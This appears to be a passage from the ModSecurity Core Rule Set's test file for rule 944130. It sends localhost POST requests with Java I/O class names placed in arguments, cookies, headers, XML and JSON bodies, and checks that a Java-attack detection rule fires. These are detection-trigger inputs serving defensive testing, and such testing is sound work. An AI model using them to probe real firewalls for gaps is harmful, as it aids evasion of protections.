"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.BufferedInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-23 desc: "Argument name includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedInputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-24 desc: "Cookie test includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.BufferedInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-25 desc: "Cookie name includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 
"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.BufferedInputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-26 desc: "Request header test includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.BufferedInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-27 desc: "XML attribute value includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-28 desc: "XML element value includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedInputStream" output: log_contains: "id 
\"944130\"" - test_title: 944130-29 desc: "Nested XML element value includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-30 desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.BufferedInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-31 desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.BufferedInputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-32 desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: 
"localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.BufferedInputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-33 desc: "Argument test includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.BufferedReader" output: log_contains: "id \"944130\"" - test_title: 944130-34 desc: "Argument name includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedReader=test" output: log_contains: "id \"944130\"" - test_title: 944130-35 desc: "Cookie test includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 
"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.BufferedReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-36 desc: "Cookie name includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.BufferedReader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-37 desc: "Request header test includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.BufferedReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-38 desc: "XML attribute value includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id 
\"944130\"" - test_title: 944130-39 desc: "XML element value includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedReader" output: log_contains: "id \"944130\"" - test_title: 944130-40 desc: "Nested XML element value includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedReader" output: log_contains: "id \"944130\"" - test_title: 944130-41 desc: "Content-Type text/plain includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.BufferedReader" output: log_contains: "id \"944130\"" - test_title: 944130-42 desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.BufferedReader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-43 desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.BufferedReader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-44 desc: "Argument test includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.ByteArrayInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-45 desc: "Argument name includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" 
Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayInputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-46 desc: "Cookie test includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.ByteArrayInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-47 desc: "Cookie name includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.ByteArrayInputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-48 desc: "Request header test includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.ByteArrayInputStream method: "POST" version: 
"HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-49 desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-50 desc: "XML element value includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-51 desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-52 desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" 
User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.ByteArrayInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-53 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.ByteArrayInputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-54 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.ByteArrayInputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-55 desc: "Argument test includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.ByteArrayOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-56 desc: "Argument name includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-57 desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.ByteArrayOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-58 desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: 
java.io.ByteArrayOutputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-59 desc: "Request header test includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.ByteArrayOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-60 desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-61 desc: "XML element value includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-62 desc: "Nested XML element value includes keyword 
java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-63 desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.ByteArrayOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-64 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-65 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-66 desc: "Argument test includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.CharArrayReader" output: log_contains: "id \"944130\"" - test_title: 944130-67 desc: "Argument name includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.CharArrayReader=test" output: log_contains: "id \"944130\"" - test_title: 944130-68 desc: "Cookie test includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" 
Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.CharArrayReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-69 desc: "Cookie name includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.CharArrayReader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-70 desc: "Request header test includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 